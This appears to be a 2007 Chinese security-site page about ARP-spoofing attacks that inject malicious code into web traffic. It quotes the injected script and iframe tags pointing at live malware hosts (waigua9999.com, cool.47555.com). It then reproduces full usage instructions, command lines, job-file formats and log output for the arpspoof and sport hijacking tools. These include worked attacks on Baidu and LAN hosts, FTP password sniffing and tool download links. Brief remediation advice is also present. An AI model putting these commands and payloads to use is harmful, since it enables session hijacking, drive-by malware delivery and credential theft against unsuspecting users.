精典的ASP传奇的J2EE新生的NETFTP服务器服务器安全WINDOWSB/S 模式WEB安全WAP世界动态网站推广宣传
空间服务器数据库技术邮局服务器站長工具硬设与组建Alexa专题DHTML项目管理WEB标准电脑硬件
病毒知识电脑使用布线协议接入交换路由局域网无线网络网络规划
Visual BasicVisual C/C++MssqlMySqloracleSybase 存在安全风险进程系统进程列表应用程序进程列表其它进程列表
黑客编程漏洞分析本地提权免杀技术脚本漏洞数据库注入安全防护内网渗透加密解密工具使用
WAP技术WAP入门
 您的位置:   >> 相关知识 >> 病毒木马 >> 病毒知识 >>

同网段有IP中毒,导致ARP欺骗,VLAN挂马

合金网络科技

 
  添加日期:2007-6-18 点击次数:210次  
   
 
刚一上线
兼职报社的人问我
站怎么打开很慢
我自己马上打开,很快(因为公司带宽超好)
后来才发现首页调用全部显示不出来
赶紧进FTP,才发现全部被挂马了。。。

给空间商发消息
因同网段有IP中毒,导致ARP欺骗,VLAN挂马,故现停止W2,W3,W5,H1服务器,等解决后恢复。

以下转自落伍
服务器IIS上所有的HTML ASP ASPX  都被挂马



程序代码 程序代码
<script src=http://waigua9999.com/1.js></script>    
                                                                                        

在每个文件的头部加了如上代码。

源代码没有挂马内容。

IIS中ISAPI和重定向及域名,均没有发现异常。

会不会是路由劫持呢??

http://61.130.XXX.170/
http://61.130.XXX.172/
http://61.130.XXX.130/
三台机器都出现了相同的情况。

现在的例外情况是:

我用172服务器访问170,就没有问题 

所以现在估计是服务器输出流没有问题,是机房输出时经过路由加上去的。

机房电话找不到了,现在联系不上。郁闷。

------------------------附如下文章。。。

47555病毒 arp挂马 原理剖析


最近这种病毒比较流行,在网上看到不少网友说自己的机器出现了类似的情况,就搜集了一些资料,希望对大家有帮助。


现象:不管是访问服务器上的任何网页,就连404的页面也会在<html>后加入 
<iFrAmE SRc=http://cool.47555.com/k.htm width=1 height=1 frameborder=0></IfRaMe>,挂马的位置在html标记左右,上面这段恶意代码,它会每隔几秒加入代码,也就是说在输出具体的东西之前就被挂了,有时有有时又没有,不是网页源代码问题,也没有在网页源代码中加入恶意代码,即使重装服务器,格式化重分区过第一个硬盘,放上去网站没多久一样再会出现这种情况。 


首先就排除了网站被入侵的可能,因为首页能加在那个位置只能是title的地方,用js控制也不大可能.然后去看了php.ini的设置也没有任何的异常,而且这个插入的代码有的时候出现有的时候不出现,说明不是网站的问题了.打开同服务器的其他网站也有这个情况发生,而且状况一一样.检查并且搜索挂马的关键字之后确定不是网站程序的问题. 

那么剩下的要么是IIS自己出了问题,要么是网络的问题,因为数据是处理没有问题(这个由程序输出,而且即使是html都会出问题),经过一个一个排查,最后基本可以确定就是arp欺骗欺骗数据报走向,然后中间人修改一些定义的关键字.因为是网络层次有问题(所以重做系统是没有用的). 


目的:通过arp欺骗来直接挂马 
优点:可以直接通过arp欺骗挂马

通常的arp欺骗的攻击方式是在同一vlan下,控制一台主机来监听密码,或者结合ssh中间人攻击来监听ssh1的密码. 
但这样存在局限性:
1.管理员经常不登陆,那么要很久才能监听到密码 
2.目标主机只开放了80端口,和一个管理端口,且80上只有静态页面,那么很难利用.而管理端口,如果是3389终端,或者是ssh2,那么非常难监听到密码. 

优点:
1.可以不用获得目标主机的权限就可以直接在上面挂马 
2.非常隐蔽,不改动任何目标主机的页面或者是配置,在网络传输的过程中间直接插入挂马的语句. 
3.可以最大化的利用arp欺骗,从而只要获取一台同一vlan下主机的控制权,就可以最大化战果. 


原理:arp中间人攻击,实际上相当于做了一次代理。 

正常时候: A---->B ,A是访问的正常客户,B是要攻击的服务器,C是被我们控制的主机 
arp中间人攻击时候: A---->C---->B 
B---->C---->A 
实际上,C在这里做了一次代理的作用 

那么HTTP请求发过来的时候,C判断下是哪个客户端发过来的包,转发给B,然后B返回HTTP响应的时候,在HTTP响应包中,插入一段挂马的代码,比如<iframe>...之类,再将修改过的包返回的正常的客户A,就起到了一个挂马的作用.在这个过程中,B是没有任何感觉的,直接攻击的是正常的客户A,如果A是管理员或者是目标单位,就直接挂上马了. 

什么是ARP? 

英文原义:Address Resolution Protocol  
中文释义:(RFC-826)地址解析协议 局域网中,网络中实际传输的是“帧”,帧里面是有目标主机的MAC地址的。所谓“地址解析”就是主机在
发送帧前将目标IP地址转换成目标MAC地址的过程。ARP协议的基本功能就是通过目标设备的IP地址,查询目标设备的MAC地址以保证通信的顺利进行。  

注解:简单地说,ARP协议主要负责将局域网中的32为IP地址转换为对应的48位物理地址,即网卡的MAC地址,比如IP地址为192.168.0.1网卡MAC地址为00-03-0F-FD-1D-2B。整个转换过程是一台主机先向目标主机发送包含IP地址信息的广播数据包,即ARP请求,然后目标主机向该主机发送一个含有IP地址和MAC地址数据包,通过MAC地址两个主机就可以实现数据传输了。  

应用:在安装了以太网网络适配器的计算机中都有专门的ARP缓存,包含一个或多个表,用于保存IP地址以及经过解析的MAC地址。在Windows中要查看或者修改ARP缓存中的信息,可以使用arp命令来完成,比如在Windows XP的命令提示符窗口中键入“arp -a”或“arp -g”可以查看ARP缓存中的内容;键入“arp -d IPaddress”表示删除指定的IP地址项(IPaddress表示IP地址)。arp命令的其他用法可以键入“arp /?”查看到。 


解决方案如下:

联系机房,用拨网线的排除法,找出同路由内中了类似47555病毒的机器,隔离。杀毒。

其他机器,遇到这种情况,重装系统是没用的。

去了趟机房发现:
很多人在忙着。已经乱套了,好几个大客户在跟进中。

中国化工网,钱塘在线等知名网站,都在里面。


arpspoof 3.1b正式发布


主要功能:ARP欺骗过程中进行数据修改,实现会话劫持攻击
说明: 本程序公开源代码,为了换取更多朋友的指教

实例: 欺骗192.168.0.108访问百度网站的全过程(注:#后是我加的注释)
效果: 192.168.0.108看到的百度首页只有一句话“Hack by cooldiyer”,攻击成功。
图解:
__________________________________________________________________________________
F:\arpspoof\Release>arpspoof /n
ARPSpoof 3.1b by CoolDiyer 06-10-30
[+] Replace Job file job.txt release success... # 利用程序自动生成的规则文件,就能搞定

F:\arpspoof\Release>arpspoof 192.168.0.1 192.168.0.108 80 2 1 /r job.txt
ARPSpoof 3.1b by CoolDiyer 06-10-30
Parsing rul <hea ==> Hack by cooldiyer<noframes> # 程序加载文件job.txt中的规则,可用arpspoof /n生成模板

Parsing rul <HEA ==> Hack by cooldiyer<noframes>
[+] Loaded 2 rules... # 共加载了两条规则,如果文件格式不对,程序在这里会中断

Spoofing 192.168.0.1 <-> 192.168.0.108 # 开始arpspoof欺骗,监视转发的数据包
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80 # 程序捕捉到了一个需要转发的数据包,但没找到要替换的字符串

Forwarding untouched packet of size 62 # 所以直接转发出去,以下几个也是
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304 # ............

Forwarding untouched packet of size 62
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80

Forwarding untouched packet of size 60
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80

Forwarding untouched packet of size 399
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304

Forwarding untouched packet of size 60
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304 # 程序捕捉到了一个需要转发的数据包,找到了要替换的内容,应用规则。
Applying rul <hea ==> Hack by cooldiyer<noframes> # 把“<hea”替换成了“Hack by cooldiyer<noframes>”

Done 1 replacements, forwarding packet of size 1474 # 给出提示这个数据包被替换了多少次,替换后包的大小 (调试用的)
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304

Forwarding untouched packet of size 1474
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80

Forwarding untouched packet of size 60
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304

Forwarding untouched packet of size 237
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80

Forwarding untouched packet of size 60
[+] Reseting ..... # Ctrl+C,程序自动恢复受骗主机的ARP缓存
[-] Sleep 5s ............ # 5秒退出
__________________________________________________________________________________

其它说明:
arpspoof 192.168.0.1 192.168.0.108 80 2 1 /s sniff.log
可保存数据到文件,
arpspoof 192.168.0.1 192.168.0.108 80 2 1
只显示数据
被替换的字符串要尽可能的短,这样能减少程序负担,可参考arpspoof /n生成的规则文件job.txt
需要说的是程序在公网下照样使用,我已经解说过了,不再举例.........
规则文件的使用可以看程序的书写,本程序开放源代码

点击下载
http://201314.free.fr/attachments/200612/arpspoof.3.1.zip 


基于arp欺骗的端口劫持工具(sport) 和会话修改工具(arspoof)

第一个: sport.exe
_______________________________________________________
适应环境:Lan + Switch
sport.exe (VC++ 6.0 && Winpcap 3.1 && UPX Release) 17KB

ARP portspoof Ver 1.0 by cooldiyer
Usage:
sport <Target> <IP1> <port> <IP2> <port> <AdpNum>
sport /l
_______________________________________________________

sport /l 列出网卡 

假定baidu.com的IP为220.181.18.114, 要欺骗的IP为192.168.0.12,网卡ID为2
这时要想让192.168.0.12访问百度的时候数据转发到别的网站,可用如下命令

转到202.107.5.23 的81端口上 (你架好的网马) 网卡ID为2

sport 192.168.0.12 220.181.18.114 80 202.107.5.23 81 2

这时192.168.0.12访问baidu的时候返回的数据就是202.107.5.23的81端口上返回的信息

也可以转到局域网其它主机上,如

sport 192.168.0.12 220.181.18.114 80 192.168.0.100 8080 2

还可以转到自己上面,假定自身IP为192.168.0.18,架个web服务器,端口为81

sport 192.168.0.12 220.181.18.114 80 192.168.0.18 81 2

192.168.0.12访问百度时出来的就是你自己web服务上的页面

因为程序基于ARP欺骗,所以Target也就是受骗主机必须与你一个网段
还有就是不能欺骗网关(因为危害性过大,程序略去这段代码)

这些功能,可以用来做内网渗透,加上社会工程学,能做很多想不到的事情
_________________________________________________________________________________

第二个: arpspoof.exe
_______________________________________________________
适应环境:Lan + Switch
sport.exe (VC++ 6.0 && Winpcap 3.1 && UPX Release) 19.5KB

ArpSpoof Ver 3.1 by CoolDiyer
Usage:
ArpSpoof <IP1> <IP2> <PORT> <AdpNum> <Mode> <JobFile>
ArpSpoof /l
Mode Options:
0 IP1 --> IP2
1 IP1 <-> IP2
Examples:
> ArpSpoof 192.168.0.1 192.168.0.8 80 2 1 job.txt
#Spoof 192.168.0.1 <-> 192.168.0.8

> ArpSpoof 192.168.0.1 192.168.0.8 80 2 0 /RESET
#Reset 192.168.0.1 --> 192.168.0.8

> ArpSpoof /l
#Lists Adapters

> ArpSpoof /n
#Release a new replace job file
_______________________________________________________

程序实现的功能就是ARPSpoof欺骗转发数据包的同时修改数据,加入恶意代码 (可用在公网上)

arpspoof /l 列出网卡ID

注意JobFile里面内容格式如下(可以用arpspoof /n新建一个任务文件)

----
<hea
----
Hack by cooldiyer<noframes>
----
<HEA
----
Hack by cooldiyer<noframes>

懂超文本的可以一下子就看出来什么意思了,就是把'<hea'换成'Hack by cooldiyer<noframes>'这样的话,网页就只显示了'Hack by cooldiyer',因为<noframes>标签屏蔽了它后面所有的标签,这招绝吧,呵呵
程序把它'----'当做分隔符,从第一个分隔符开始,第一个是要替换的旧字符串,第二个分隔符下是要替换成的新字串,不能换行
依次下去,第三个分隔符又是一个要替换的旧字符串,第四个又是一个要替换成的新字串,依次类摊,可以无限添加,不过越少越好,因为多了程序吃不消的

下面说攻击实例

1:外网攻击实例

比如baidu主机为220.181.18.114,你有这个网段随意一台主机的最高权限比如220.181.18.9,网关为220.181.18.1
你就可以黑百度了,网卡ID为2,只更改百度到网关的数据就够了,job.txt 用 arpspoof /n生成,命令如下
arpspoof 220.181.18.1 220.181.18.114 80 2 0 job.txt
这样,其它人访问百度时候就只看到一行字'Hack by cooldiyer',当然你也可以更改其它数据用做别的用途

2:内网攻击实例
道理一样,你想让192.168.0.100访问百度时看到一个被黑的页面,网关为192.168.0.1,其它默认,执行命令如下:
arpspoof 192.168.0.1 192.168.0.100 80 2 0 job.txt
它访问百度里就看到被黑页面了,当然你也可以改写成其它的代码

3: 数据嗅探,呵呵,基本的功能,如果参数后面不跟任务文件的话,程序就是把指定端口的数据给显示出来如,嗅探FTP密码

arpspoof 202.103.248.1 202.103.248.100 21 2 1

程序会自动把嗅探到的21端口的数据给显示出来 


临时防御:
ARP防火墙单机版4.0.1,03月12日发布,原名Anti ARP Sniffer,采用全新系统内核层拦截技术,能彻底解决所有ARP攻击带来的问题,能够保证在受到ARP攻击时网络仍然正常,能彻底解决在受到攻击时出现的丢包现象。能自动拦截并防御各类ARP攻击程序、ARP病毒、ARP木马、通过智能分析抑制所有ARP恶意程序发送虚假数据包。自动识别ARP攻击数据类型:外部攻击、IP冲突、对外攻击数据,并详细记录所有可疑数据包并追踪攻击者,软件能自动统计ARP广播包发送接受数量。作者授权发布。 

下载:
http://www.hackerdown.com/down.asp?id=25&no=1


精典的ASP精选TOP
· 利用ADODB.Stream 防盗链
· Adodb.Stream说明手册
· 采集需要登录
· ASP 判断远程图片是否存在
· 在ServerXMLHTTP组件中使用代理服务器
· 用XMLHTTP通过代理服务器从服务提取数据的一些问题
· objXML.readystate的值
· 互联网HTTP连接等出错代码大全
· 利用XMLHTTP实现的二级连动Select
· 利用 xmlhttp 分块上传文件
 
服务器安全点击TOP
· 新云最新漏洞总结篇
· 各类网站的默认数据库和密码
· Windows Server2003 防木马权限设置IIS服务器安全配置整理
· 针对ASP网站的Win 2003硬盘安全设置
· IIS 6 的PHP 最佳配置方法
· 利用SA.exe 将Iusr_victim克隆为Administrator
· Cmd模式下的入侵技术大全
· 破解网页代码加密
· SERV-U 6.4提权方法,通杀SERV-U版本
· 新云网站管理系统文件注入漏洞
 
硬设与组建点击TOP
· 从头到尾教你组建小型局域网20
· 从头到尾教你组建小型局域网19
· 从头到尾教你组建小型局域网18
· 从头到尾教你组建小型局域网17
· 从头到尾教你组建小型局域网16
· 从头到尾教你组建小型局域网15
· 从头到尾教你组建小型局域网14
· 从头到尾教你组建小型局域网13
· 从头到尾教你组建小型局域网12
· 从头到尾教你组建小型局域网11
 
病毒知识点击TOP
· 不再重装 手动清除顽固病毒AutoRUN
· 木马静态变动态 DLL木马程序大揭秘
· 详解一个很牛X的网马
· 一个网马
· Trojan-Downloader.Win32.Delf.bab
· 抓了一个AJAX的网马
· 迅雷5 最新0day利用程序
· 自动关掉270种杀毒软件
· RealPlayer 最新网马
· 五个反弹型后门的源代码
 
WINDOWS点击TOP
· 4【系统知识】常见文件扩展名及简要说明!!! ==超详尽==
· 3【系统知识】常见文件扩展名及简要说明!!! ==超详尽==
· 2【系统知识】常见文件扩展名及简要说明!!! ==超详尽==
· 1【系统知识】常见文件扩展名及简要说明!!! ==超详尽==
· Capture an HTML document as an image
· 如何给eWebEditor编辑器加上运行代码框功能
· 给CuteEditor5增加了高亮代码显示功能
· CuteEditor6.0使用配置心得体会
· 关于IE插件的CLSID问题
· 对开发的程序(制作CAB)进行签名,并允许网站中使用
  "凌风微型文章系统",针对"搜索引擎"完美设计,提高"搜索引擎"对网站容量,质量的评估值,"扁平化,转静态 ..."